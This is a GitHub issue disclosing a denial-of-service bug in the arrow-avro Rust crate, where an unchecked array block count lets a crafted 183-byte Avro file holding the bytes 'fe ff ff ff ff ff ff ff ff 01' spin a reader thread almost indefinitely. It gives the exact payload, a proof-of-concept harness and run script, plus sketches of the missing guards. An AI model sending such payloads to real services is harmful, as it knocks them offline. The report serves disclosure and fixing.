hibrian827 opened a new issue, #10235:
URL: https://github.com/apache/arrow-rs/issues/10235

   ### Describe the bug
   
   ## Summary
   arrow-avro (the standalone Rust Avro Object Container File (OCF) reader in
   apache/arrow-rs, published to crates.io as 59.0.0) reads array block counts from
   attacker-controlled Avro streams without any per-call or cumulative cap. The
   shared array/map decode helper `process_blockwise` at
   `arrow-avro/src/reader/record.rs:2274-2310` reads `block_count: i64` from
   `buf.get_long()?` and uses `block_count as usize` directly as the bound of the
   loop `for _ in 0..count { on_item(buf)?; }`. There is no `MaxBlockItems`
   constant, no `count * min_bytes_per_item` guard, and no cumulative cap. For an
   `array<null>` schema the per-item decoder is `Self::Null(x) => *x += 1`, which
   consumes zero bytes. A single 10-byte zigzag varint encoding
   `i64::MAX = 9_223_372_036_854_775_807`, placed in the record body of an
   otherwise well-formed 183-byte Avro OCF, therefore drives a CPU-bound spin of
   ~9.2 × 10^18 iterations in the worker thread that called `Reader::next()`. A
   remote, unauthenticated peer can tie up one parser-pool slot per 183-byte upload
   for the lifetime of the process, causing permanent service-level availability
   loss (CVSS 7.5, AV:N/AC:L/PR:N/UI:N, A:H, no C/I impact).
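
   For concreteness: Avro writes a `long` as a zigzag-mapped varint (7 bits per
   byte, low-order group first, high bit set on every byte but the last). The
   standalone sketch below does not use arrow-avro; `encode_zigzag_long` and
   `decode_zigzag_long` are illustrative helpers, not crate APIs. It checks that
   the 10 bytes `fe ff ff ff ff ff ff ff ff 01` are exactly the encoding of
   `i64::MAX`, and that an unchecked `as usize` cast keeps the full magnitude on
   a 64-bit target.

   ```rust
   /// Illustrative encoder for an Avro `long`: zigzag map, then 7 bits per byte,
   /// low-order group first, high bit set on every byte except the last.
   fn encode_zigzag_long(v: i64) -> Vec<u8> {
       let mut z = ((v << 1) ^ (v >> 63)) as u64;
       let mut out = Vec::new();
       loop {
           let byte = (z & 0x7f) as u8;
           z >>= 7;
           if z == 0 {
               out.push(byte);
               return out;
           }
           out.push(byte | 0x80);
       }
   }

   /// Illustrative decoder: returns the value and the number of bytes consumed,
   /// or `None` for a truncated or over-long varint. Like the report says of
   /// `AvroCursor::get_long`, it places no cap on the decoded magnitude.
   fn decode_zigzag_long(bytes: &[u8]) -> Option<(i64, usize)> {
       let mut raw: u64 = 0;
       for (i, &b) in bytes.iter().enumerate().take(10) {
           raw |= u64::from(b & 0x7f) << (7 * i);
           if b & 0x80 == 0 {
               // Undo zigzag: 0 -> 0, 1 -> -1, 2 -> 1, 3 -> -2, ...
               return Some((((raw >> 1) as i64) ^ -((raw & 1) as i64), i + 1));
           }
       }
       None
   }

   fn main() {
       let payload: [u8; 10] = [0xfe, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x01];
       assert_eq!(encode_zigzag_long(i64::MAX), payload.to_vec());
       let (block_count, used) = decode_zigzag_long(&payload).expect("well-formed varint");
       assert_eq!((block_count, used), (i64::MAX, 10));
       // The unchecked cast used as the loop bound keeps the full magnitude
       // on a 64-bit target.
       println!("block_count = {block_count} ({used} bytes), as usize = {}", block_count as usize);
   }
   ```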
   
   ## Affected
   - Pinned ref: c8eba1a0b9e6c307109c9f69ac2aae728b4c8cd9
   
   ## Root cause
   The public entry point is `ReaderBuilder::build<R: BufRead>(self, mut reader: R)`
   at `arrow-avro/src/reader/mod.rs:1289` (called as
   `ReaderBuilder::new().build(reader)`). It validates the OCF header in
   `read_header()` (Avro magic `Obj\x01`, schema JSON parse, codec descriptor) and
   returns a `Reader<R>`. When the caller iterates the reader, `Reader::read` calls
   `self.decoder.decode_block(&self.block_data[self.block_cursor..], self.block_count)`
   at `arrow-avro/src/reader/mod.rs:1392`. `Decoder::decode_block` (defined at
   `arrow-avro/src/reader/mod.rs:887`) dispatches to
   `self.active_decoder.decode(data, to_decode)` at
   `arrow-avro/src/reader/mod.rs:893`, which on the OCF path is
   `RecordDecoder::decode(buf, count=1)` at `arrow-avro/src/reader/record.rs:155`.
   `RecordDecoder::decode` runs its outer per-record loop exactly once, for the
   single record in this block. The schema `{record X { array<null> f }}` has one
   field whose decoder is `Self::Array(_, off, encoding)`, so dispatch lands at
   `arrow-avro/src/reader/record.rs:1288`, and record-body decoding continues at
   `arrow-avro/src/reader/record.rs:1289` with
   `let total_items = read_blocks(buf, |cursor| encoding.decode(cursor))?;`. The
   closure captures `encoding = Self::Null(0)` (the decoder for the array's
   `items: "null"`), so `encoding.decode(cursor)` invokes `Self::Null(x) => *x += 1`
   at `arrow-avro/src/reader/record.rs:1167`, which reads zero bytes from the
   `AvroCursor` and merely increments an internal `usize` counter.
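
   The crux is that an `array<null>` item occupies zero bytes on the wire, so
   nothing ties the loop count to the size of the input. The simplified model
   below illustrates that interaction; `Cursor`, `ItemDecoder` and `run_block` are
   hypothetical stand-ins, not arrow-avro's `AvroCursor` or decoder types. It
   contrasts a zero-byte `Null` decoder with a one-byte `Boolean` decoder under
   the same inflated count.

   ```rust
   /// Hypothetical stand-in for a byte cursor (not arrow-avro's `AvroCursor`).
   struct Cursor<'a> {
       buf: &'a [u8],
       pos: usize,
   }

   /// Hypothetical per-item decoders (not arrow-avro's decoder enum).
   enum ItemDecoder {
       /// Counts nulls. An Avro `null` is encoded as zero bytes.
       Null(usize),
       /// Contrast case: an Avro `boolean` is encoded as exactly one byte.
       Boolean(Vec<bool>),
   }

   impl ItemDecoder {
       fn decode(&mut self, cur: &mut Cursor<'_>) -> Result<(), String> {
           match self {
               // Same shape as the reported `Self::Null(x) => *x += 1`: reads nothing.
               ItemDecoder::Null(x) => *x += 1,
               ItemDecoder::Boolean(values) => {
                   let byte = *cur.buf.get(cur.pos).ok_or("unexpected end of block")?;
                   cur.pos += 1;
                   values.push(byte != 0);
               }
           }
           Ok(())
       }
   }

   /// The unbounded item loop: `count` comes straight from the input.
   fn run_block(dec: &mut ItemDecoder, cur: &mut Cursor<'_>, count: usize) -> Result<(), String> {
       for _ in 0..count {
           dec.decode(cur)?;
       }
       Ok(())
   }

   fn main() {
       // Only the 0x00 end-of-array terminator is left in the block.
       let body: [u8; 1] = [0x00];

       let mut cur = Cursor { buf: &body, pos: 0 };
       let mut nulls = ItemDecoder::Null(0);
       run_block(&mut nulls, &mut cur, 1_000_000).expect("null items never fail");
       // A million items "decoded", yet the cursor never moved off the terminator.
       assert_eq!(cur.pos, 0);

       let mut cur = Cursor { buf: &body, pos: 0 };
       let mut bools = ItemDecoder::Boolean(Vec::new());
       // A byte-consuming item type runs out of input after one item.
       assert!(run_block(&mut bools, &mut cur, 1_000_000).is_err());
       assert_eq!(cur.pos, 1);
       println!("null: cursor at 0 after 1e6 items; boolean: EOF after 1 byte");
   }
   ```

   With a byte-consuming item type an inflated count fails fast at end of input;
   with `null` items the only thing that ever stops the loop is the count itself.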
   
   `read_blocks` at `arrow-avro/src/reader/record.rs:2266-2271` forwards to
   `process_blockwise(buf, decode_entry, NegativeBlockBehavior::ProcessItems)` at
   `arrow-avro/src/reader/record.rs:2270`. Inside `process_blockwise`, the
   block-count read at `arrow-avro/src/reader/record.rs:2285` is
   `let block_count = buf.get_long()?;`. The 10-byte zigzag varint
   `fe ff ff ff ff ff ff ff ff 01` decodes cleanly to
   `i64::MAX = 9_223_372_036_854_775_807`, because `AvroCursor::get_long` rejects
   only malformed varints and buffer EOF and places no magnitude cap on the returned
   `i64`. The `block_count.cmp(&0)` match takes the `Ordering::Greater` branch at
   `arrow-avro/src/reader/record.rs:2306` and executes `let count = block_count as usize;`
   at `arrow-avro/src/reader/record.rs:2307`, an unchecked i64→usize cast with no
   `MaxBlockItems` constant, no buffer-relative bound such as
   `count * min_bytes_per_item <= buf.remaining()`, and no cumulative-items cap. It
   then enters the item loop `for _ in 0..count { on_item(buf)?; }` at
   `arrow-avro/src/reader/record.rs:2308-2310`. Because `on_item` is the
   `Self::Null(x) => *x += 1` decoder at `arrow-avro/src/reader/record.rs:1167`,
   which consumes no bytes, the `AvroCursor` never advances, the trailing `0x00`
   empty-block terminator is never read, and `process_blockwise` does not return in
   any practical time frame: the worker thread that called `Reader::next()` spins
   through ~9.2 × 10^18 iterations of a `usize` counter increment.
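
   A minimal sketch of the three guards described above as missing, under stated
   assumptions: `checked_block_len` and `MAX_TOTAL_ITEMS` are hypothetical (no such
   items exist in arrow-avro at the pinned ref), the cap value is arbitrary, and
   `min_bytes_per_item` would have to be derived from the item schema (0 for
   `null`). The check runs once per block, before the item loop, so a hostile count
   is rejected without iterating.

   ```rust
   /// Hypothetical cumulative cap on array/map items per value; arrow-avro has no
   /// such constant at the pinned ref, and the value here is arbitrary.
   const MAX_TOTAL_ITEMS: usize = 1 << 24;

   /// Sketch of the missing checks, run once per block before the item loop.
   /// `remaining` is the number of unread bytes in the current data block;
   /// `min_bytes_per_item` is the smallest encoding of one item (0 for `null`);
   /// `items_so_far` counts items already decoded for this array/map value.
   fn checked_block_len(
       block_count: i64,
       remaining: usize,
       min_bytes_per_item: usize,
       items_so_far: usize,
   ) -> Result<usize, String> {
       // Per the Avro spec a negative count means |count| items, with a `long`
       // byte size written right after the count; only the item count is checked.
       let count = usize::try_from(block_count.unsigned_abs())
           .map_err(|_| format!("block count {block_count} does not fit in usize"))?;

       // Buffer-relative bound: items that need >= 1 byte cannot outnumber the
       // bytes left. Division avoids overflow in `count * min_bytes_per_item`.
       if min_bytes_per_item > 0 && count > remaining / min_bytes_per_item {
           return Err(format!("block count {count} exceeds {remaining} remaining bytes"));
       }

       // Cumulative bound: the only check here that catches zero-byte items.
       match items_so_far.checked_add(count) {
           Some(total) if total <= MAX_TOTAL_ITEMS => Ok(count),
           _ => Err(format!("array/map item count exceeds {MAX_TOTAL_ITEMS}")),
       }
   }

   fn main() {
       // The reported payload: i64::MAX `null` items (0 bytes each), 1 byte left.
       assert!(checked_block_len(i64::MAX, 1, 0, 0).is_err());
       // An honest block of 3 one-byte items with 3 bytes remaining is accepted.
       assert_eq!(checked_block_len(3, 3, 1, 0), Ok(3));
       // Negative counts are validated by magnitude.
       assert_eq!(checked_block_len(-3, 3, 1, 0), Ok(3));
       println!("guards behave as expected");
   }
   ```

   The buffer-relative bound alone cannot reject this payload, because a `null`
   item has a minimum size of zero bytes; only a per-block or cumulative cap does.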
   
   ### To Reproduce
   
   <details>
   <summary>PoC</summary>
   
   inputs/src/main.rs
   ```rs
   use std::io::Cursor;
   use std::sync::mpsc;
   use std::thread;
   use std::time::Duration;
   
   use arrow_avro::reader::ReaderBuilder;
   
   fn main() {
       let path = std::env::args().nth(1).expect("usage: trigger <file>");
       let bytes = std::fs::read(&path).unwrap_or_else(|e| {
           eprintln!("STATUS=NOT_TRIGGERED, read_error: {e}");
           std::process::exit(0);
       });
   
       let (tx, rx) = mpsc::channel();
       thread::spawn(move || {
           let result: Result<(), String> = (|| {
               let mut reader =
                   ReaderBuilder::new().build(Cursor::new(bytes)).map_err(|e| e.to_string())?;
               while let Some(batch) = reader.next() {
                   let batch = batch.map_err(|e| e.to_string())?;
                   eprintln!("decoded batch of {} rows", batch.num_rows());
               }
               Ok(())
           })();
           let _ = tx.send(result);
       });
   
       match rx.recv_timeout(Duration::from_secs(15)) {
           Ok(Ok(())) => println!("STATUS=NOT_TRIGGERED, decode_completed"),
           Ok(Err(e)) => println!("STATUS=NOT_TRIGGERED, decode_error: {e}"),
           Err(mpsc::RecvTimeoutError::Timeout) => println!("STATUS=TRIGGERED"),
           Err(mpsc::RecvTimeoutError::Disconnected) => println!("STATUS=NOT_TRIGGERED, worker_died"),
       }
   }
   
   ```
   run.sh
   ```sh
   #!/usr/bin/env bash
   set -euo pipefail
   
   script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
   source_dir="$script_dir/source"
   
   UPSTREAM_REPO_URL="https://github.com/apache/arrow-rs"
   UPSTREAM_PINNED_SHA="c8eba1a0b9e6c307109c9f69ac2aae728b4c8cd9"
   
   _silent() {
     local label="$1"; shift
     local log="$script_dir/.${label}.log"
     if ! "$@" > "$log" 2>&1; then
       echo "[run.sh] $label failed; log follows:" >&2
       cat "$log" >&2
       return 1
     fi
   }
   
   setup() {
     if [[ -d "$source_dir/.git" ]] \
        && [[ "$(git -C "$source_dir" rev-parse HEAD 2>/dev/null)" == "$UPSTREAM_PINNED_SHA" ]]; then
       echo "[run.sh] reusing existing $source_dir at $UPSTREAM_PINNED_SHA"
       return 0
     fi
     _setup_inner() {
       rm -rf "$source_dir"
       mkdir -p "$source_dir"
       cd "$source_dir"
       git init -q
       git remote add origin "$UPSTREAM_REPO_URL"
       if git fetch --depth 1 origin "$UPSTREAM_PINNED_SHA" -q 2>/dev/null; then
         git checkout -q FETCH_HEAD
       else
         cd "$script_dir"
         rm -rf "$source_dir"
         git clone -q "$UPSTREAM_REPO_URL" "$source_dir"
         git -C "$source_dir" checkout -q "$UPSTREAM_PINNED_SHA"
       fi
       local head
       head="$(git -C "$source_dir" rev-parse HEAD)"
       if [[ "$head" != "$UPSTREAM_PINNED_SHA" ]]; then
         echo "setup: HEAD=$head but expected $UPSTREAM_PINNED_SHA" >&2
         exit 1
       fi
     }
     _silent setup _setup_inner
     # One-line confirmation reaches the terminal — mirrors the
     # 'Pinned ref:' line in the report README so the maintainer can see
     # exactly which commit they're exercising before the proof emits.
     echo "[run.sh] reproducing against $UPSTREAM_REPO_URL @ $UPSTREAM_PINNED_SHA"
   }
   
   build() {
     _silent build bash -c '
       set -euo pipefail
       cd "$1"
       cargo build --release
       mkdir -p target
       cp target/release/trigger target/trigger
       chmod +x target/trigger
     ' _ "$script_dir"
   }
   
   trigger() {
     _silent run "$script_dir/target/trigger" "$script_dir/inputs/malicious.avro"
     local log="$script_dir/.run.log"
     if grep -qE "^STATUS=TRIGGERED$" "$log"; then
       grep -E "^STATUS=TRIGGERED$" "$log"
     else
       echo "[run.sh] expected STATUS=TRIGGERED in trigger output" >&2
       cat "$log" >&2
       exit 1
     fi
   }
   
   cmd="${1:-all}"
   case "$cmd" in
     setup)         setup ;;
     build)         setup; build ;;
     trigger|all|"") setup; build; trigger ;;
     *)
       echo "usage: $0 {setup|build|trigger|all}" >&2
       exit 2
       ;;
   esac
   
   ```
   
   </details>
   
   Run the self-contained PoC bundle:
   
   ```bash
   bash ./poc/run.sh
   ```
   
   ### Expected behavior
   
   Expected output (the runtime signature pinned by the Stage-3 oracle, 
recorded verbatim in `last_run/oracle.log` as `fingerprint='STATUS=TRIGGERED'` 
and emitted to stdout by the driver):
   
   ```
   STATUS=TRIGGERED
   ```
   
   The driver's main thread prints `STATUS=TRIGGERED` when its 15-second wait for
   the worker thread (the one that called `Reader::next()`) times out. The timeout
   fires because the worker is stuck in the `for _ in 0..count { on_item(buf)?; }`
   loop at `arrow-avro/src/reader/record.rs:2308`, spinning against
   `block_count = i64::MAX`. Stage-3 verified this fingerprint deterministically
   across 3/3 runs (15.029 s).
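
   For scale, a back-of-the-envelope estimate of how long the loop would take to
   finish on its own. The rate of 10^9 iterations per second is an assumption
   chosen for order of magnitude, not a measurement, and `spin_years` is a
   hypothetical helper.

   ```rust
   /// Hypothetical helper: wall-clock years needed for `iterations` loop passes at
   /// `iters_per_sec` (an assumed, not measured, rate).
   fn spin_years(iterations: f64, iters_per_sec: f64) -> f64 {
       const SECS_PER_YEAR: f64 = 365.25 * 24.0 * 3600.0;
       iterations / iters_per_sec / SECS_PER_YEAR
   }

   fn main() {
       // `block_count as usize` for block_count = i64::MAX on a 64-bit target.
       let iterations = i64::MAX as f64;
       // ASSUMPTION: ~1e9 iterations per second; the real rate varies by CPU/build.
       let years = spin_years(iterations, 1e9);
       // Share of the loop completed before the driver's 15 s timeout fires.
       let fraction_seen = 15.0 * 1e9 / iterations;
       println!("~{years:.0} years; the 15 s timeout covers {fraction_seen:.1e} of the loop");
   }
   ```

   Under that assumption the loop would need roughly 292 years to finish, so the
   15-second timeout observes only about 1.6 × 10^-9 of the total work.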
   
   
   ### Additional context
   
   _No response_

